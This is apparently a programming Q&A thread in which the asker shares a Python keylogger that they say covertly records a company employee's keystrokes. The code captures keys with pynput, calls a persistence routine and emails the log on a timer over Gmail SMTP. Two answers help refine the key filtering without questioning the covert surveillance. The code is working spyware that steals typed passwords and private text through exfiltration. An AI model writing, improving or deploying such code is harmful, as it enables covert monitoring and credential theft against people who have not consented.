# How to stop key.esc to be sent in my email?

Tags: python

I created a small program to send me  keystrokes that a user in my company types, but I can't find a way to implement to not send me in my email these kind of types, " key.esc, key.space, key.enter, key.tab

Here is the code I am using

```
#!/usr/bin/env python
```

import pynput.keyboard
import threading
import smtplib
import os

class Keylogger:
def **init**(self, time_interval, email, password):
self.become_persistent()
self.log = "Keylogger started"
self.interval = time_interval
self.email = email
self.password = password

```
def append_to_log(self, string):
    self.log = self.log + string

def process_key_press(self, key):
    try:
        current_key = str(key.char)
    except AttributeError:
        if key == key.space:
            current_key = " "
        elif key == key.esc:
            current_key = " "
        else:
            current_key = " " + str(key) + " "
    self.append_to_log(current_key)

def report(self):
    self.send_mail(self.email, self.password, "\n\n" + self.log)
    self.log = ""
    timer = threading.Timer(self.interval, self.report)
    timer.start()


def send_mail(self, email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()
```

I want you to help me, how can I stop when my employee press esc or space or enter ? I have figured out that the space doesnt show up anymore, but It is not working wiht others.

Key.cmd rnotepad Key.enter  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc c              Key.enter  Key.enter  Key.enter

Comment: Please show what you have currently as a [mre]. It is easier for people to understand and answer your question if they have a [mre] of your code to see what you already know and have managed to code. \

Answer (score 1):

You can try with conditional IF so (Example by write file):

```
from pynput import keyboard

def on_press(key):
    buttonPress = "The key press is:" + format(key) + "\n"
    if str(key) != "Key.esc" and str(key) != "Key.space" and str(key) != "Key.enter" and str(key) != "Key.tab":
        fileOutput = open("fileLOG.txt", "a+")
        fileOutput.write(buttonPress)
```

If isn't functionally to your procedure please add your example source code.

Thank you

Comment: Doesn't the `key`  object have an attribute that you can compare to those strings instead of stringifying `key` every time?

Comment: I have used this code but I still see the excat problem.

Comment: Key.cmd rnotepad Key.enter  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc  Key.esc c              Key.enter  Key.enter  Key.enter  Key.enter  Key.enter  K

Answer (score 1):

Improving upon the previous answer. I have used f strings instead of format() and with open() instead of file.open() and file.close()

```
    from pynput import keyboard
    
    def on_press(key):
        buttonPress = f"The key press is: {key}\n"
        if str(key) != "Key.esc" and str(key) != "Key.space" and str(key) != "Key.enter" and str(key) != "Key.tab":
            with open("keys.txt", "a") as f:
                f.write(buttonPress)
```